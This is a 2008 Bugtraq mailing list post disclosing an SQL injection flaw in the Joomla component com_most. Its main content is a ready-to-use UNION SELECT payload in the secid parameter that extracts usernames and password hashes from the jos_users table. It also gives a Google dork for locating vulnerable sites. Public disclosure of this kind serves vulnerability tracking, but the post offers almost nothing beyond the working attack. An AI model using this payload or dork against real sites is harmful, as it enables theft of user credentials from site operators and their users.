
Date: 21 Feb 2008 15:33:41 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: joomla SQL Injection(com_most)secid

###############################################################
# 
#   joomla SQL Injection(com_most)secid
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
# 
#  DORK 1 : allinurl:"com_most"secid
# 
#  DORK 2 : allinurl: 
#
################################################################
   EXPLOIT : 

index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/*


################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################
